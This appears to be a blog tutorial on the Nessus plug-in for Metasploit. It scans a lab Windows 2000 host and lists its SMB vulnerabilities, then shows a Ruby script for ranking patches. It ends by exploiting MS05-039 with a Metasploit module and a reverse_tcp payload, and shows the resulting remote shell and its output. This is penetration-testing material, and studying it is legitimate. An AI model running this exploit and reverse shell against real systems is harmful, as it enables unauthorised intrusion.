<p>Recently the developer <a href="http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/">Zate Berg</a> released a <a href="http://nessus.org/nessus/">Nessus</a> plug-in for the <a href="http://www.metasploit.com/">Metasploit Framework</a>; it is available in the <a href="http://www.metasploit.com/framework/download/">development</a> version of MSF.</p>
<p>For the tests I used the following scenario:</p>
<p>* Debian host with Nessus and Metasploit<br />
* Target host running Windows 2000, “buggy to the bone”</p>
<p>I first updated MSF and Nessus, then moved on to the fun part</p>
<blockquote><p>
<strong>cd /tmp/pentest_tools/trunk</strong></p>
<p><strong>svn update</strong>
</p></blockquote>
<blockquote><p>
<strong>/opt/nessus/sbin/nessus-update-plugins</strong></p>
<p><strong>/opt/nessus/sbin/nessus-service &</strong></p>
<p><strong>./msfconsole</strong></p>
<p>[metasploit ASCII-art banner]</p>
<p>=[ metasploit v3.4.2-dev [core:3.4 api:1.0]<br />
+ -- --=[ 592 exploits - 302 auxiliary<br />
+ -- --=[ 225 payloads - 27 encoders - 8 nops<br />
=[ svn r10505 updated today (2010.09.28)</p>
<p>msf>
</p></blockquote>
<p><strong>Fun</strong> :)</p>
<p>Loading the Nessus plug-in</p>
<blockquote><p>
<strong>msf> load nessus</strong></p>
<p>[*] Nessus Bridge for Nessus 4.2.x<br />
[+] Type nessus_help for a command listing<br />
[*] Successfully loaded plugin: nessus
</p></blockquote>
<p>Connecting...</p>
<blockquote><p>
<strong>msf> nessus_connect localhost:8834 ok</strong></p>
<p>[+] Username:<br />
alexos<br />
[+] Password:<br />
***********<br />
[*] Connecting to https://localhost:8834/ as alexos<br />
[*] Authenticated
</p></blockquote>
<p>Listing the policies defined in Nessus</p>
<blockquote><p>
<strong>msf> nessus_policy_list</strong></p>
<p>[+] Nessus Policy List</p>
<p>ID Name Owner visability<br />
-- ---- ----- ----------<br />
1 attack alexos private
</p></blockquote>
<p>Starting the scan</p>
<blockquote><p>
<strong>msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6</strong></p>
<p>[*] Creating scan from policy number 1, called “alexoscorelabs” and scanning 192.168.0.6<br />
[*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
</p></blockquote>
<p>Once the scan finishes, it is time to check the report</p>
<blockquote><p>
<strong>msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8</strong></p>
<p>[+] Host Info</p>
<p>Port Protocol Severity Service Name Sev 0 Sev 1 Sev 2 Sev 3<br />
---- -------- -------- ------------ ----- ----- ----- -----<br />
0 icmp 1 general 0 2 0 0<br />
0 tcp 3 general 0 9 0 1<br />
0 udp 1 general 0 1 0 0<br />
21 tcp 3 ftp 1 4 2 2<br />
135 tcp 3 epmap 1 1 0 1<br />
135 udp 3 epmap? 0 0 0 1<br />
137 udp 1 netbios-ns 0 1 0 0<br />
139 tcp 1 smb 1 1 0 0<br />
445 tcp 3 cifs 1 10 2 12<br />
1025 tcp 3 dce-rpc 1 1 0 1<br />
1028 udp 1 dce-rpc 0 1 0 0<br />
5800 tcp 1 www 1 4 0 0<br />
5801 tcp 1 www 1 3 0 0<br />
5900 tcp 3 vnc 1 2 0 1<br />
5901 tcp 1 vnc 1 3 0 0
</p></blockquote>
<p>Getting information on the vulnerabilities found on the target's port 445 (smb)</p>
<blockquote><p>
<strong>msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0</strong></p>
<p>[+] Port Info</p>
<p>Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector<br />
---- -------- -------- ----------- ----- -------- --- ----------- -----------<br />
cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None .<br />
cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None .<br />
cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .<br />
cifs (445/tcp) 1 11011 SMB Service Detection none . . None .<br />
cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None .<br />
cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None .<br />
cifs (445/tcp) 1 17651 Obtains the password policy none . . None .<br />
cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None .<br />
cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
<strong>cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C</strong><br />
cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N<br />
cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N<br />
cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .<br />
cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None .<br />
cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
</p></blockquote>
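<p>The host-detail table above is what a patching team actually needs, but the bridge prints it as free text. The following Ruby script is an added example (not the post's or the Nessus bridge's own code) that parses those rows and ranks them for remediation, putting findings that are network-reachable, unauthenticated and have a public exploit first; the sample rows are copied from the report above.</p>

```ruby
# Added example (not the post's or the Nessus bridge's own code): parse the rows that
# "nessus_report_host_detail" prints and rank them for patching, wormable ones first.

# Constructed sample: four rows in the bridge's column layout, copied from the report above.
SAMPLE = <<~'ROWS'
  cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
  cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
  cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
ROWS

# The plugin name may contain spaces, so the fixed columns on both ends are matched
# explicitly and the name is whatever is left in the middle. "." marks an empty cell.
ROW_RE = /\A(?<port>\S+\s\(\d+\/\w+\))\s+(?<sev>\d)\s+(?<pid>\d+)\s+(?<name>.+?)\s+
          (?<cvss>[\d.]+|none)\s+(?<exploit>true|false|\.)\s+(?<cve>CVE-\d{4}-\d+|\.)\s+
          (?<risk>\w+)\s+(?<vector>\S+)\z/x

Finding = Struct.new(:port, :severity, :plugin_id, :name, :cvss, :exploit_public, :cve, :risk, :vector) do
  # Network-reachable, no authentication needed, public exploit: the first patch to apply.
  def wormable?
    exploit_public && !vector.nil? && vector.include?("AV:N") && vector.include?("Au:N")
  end
end

def parse_host_detail(text)
  text.each_line.map do |line|
    m = ROW_RE.match(line.strip) or next
    Finding.new(m[:port], m[:sev].to_i, m[:pid].to_i, m[:name],
                m[:cvss] == "none" ? 0.0 : m[:cvss].to_f, m[:exploit] == "true",
                m[:cve] == "." ? nil : m[:cve], m[:risk], m[:vector] == "." ? nil : m[:vector])
  end.compact
end

# Highest CVSS first; on a tie, findings with a public exploit come before those without.
def prioritize(findings)
  findings.sort_by { |f| [-f.cvss, f.exploit_public ? 0 : 1, f.plugin_id] }
end

# Bulletin id (e.g. "MS05-039") taken from the plugin name, so each row maps onto a patch.
def bulletin(finding)
  finding.name[/\AMS\d{2}-\d{3}/]
end

if $PROGRAM_NAME == __FILE__
  prioritize(parse_host_detail(SAMPLE)).each do |f|
    puts format("%-11s %-8s cvss=%-4s exploit=%-5s %s", f.wormable? ? "PATCH FIRST" : "review",
                bulletin(f) || "-", f.cvss, f.exploit_public, f.name)
  end
end
```

Feeding it the full table from the post lists every MS bulletin the host is missing, in the order they should be applied.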
<p>Using MSF, I exploited MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution</p>
<blockquote><p>
<strong>msf> use exploit/windows/smb/ms05_039_pnp</strong></p>
<p><strong>msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6</strong></p>
<p><strong>msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp</strong></p>
<p><strong>msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3</strong></p>
<p><strong>msf exploit(ms05_039_pnp)> exploit</strong></p>
<p>[*] Started reverse handler on 192.168.0.3:4444<br />
[*] Connecting to the SMB service…<br />
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] …<br />
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] …<br />
[*] Calling the vulnerable function…<br />
[*] Sending stage (240 bytes) to 192.168.0.6<br />
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010<br />
[*] Server did not respond, this is expected<br />
[*] The server should have executed our payload</p>
<p><strong><br />
Microsoft Windows 2000 [Version 5.00.2195]<br />
(C) Copyright 1985-1999 Microsoft Corp.<br />
</strong></p>
<p>C:\WINNT\system32>
</p></blockquote>
<blockquote><p>
C:\WINNT\system32> ipconfig<br />
ipconfig</p>
<p>Windows 2000 IP Configuration</p>
<p>Ethernet adapter Local Area Connection:</p>
<p>Connection-specific DNS Suffix . :<br />
IP Address. . . . . . . . . . . . : 192.168.0.6<br />
Subnet Mask . . . . . . . . . . . : 255.255.255.0<br />
Default Gateway . . . . . . . . . : 192.168.0.2
</p></blockquote>
<p>MSF add-ons like this are always welcome; another interesting integration is Metasploit with <a href="http://ettercap.sourceforge.net/">Ettercap</a> for <a href="http://en.wikipedia.org/wiki/Man-in-the-middle_attack">MITM</a> testing.</p>
Playing with the Nessus plugin for Metasploit
28 September 2010, 0:00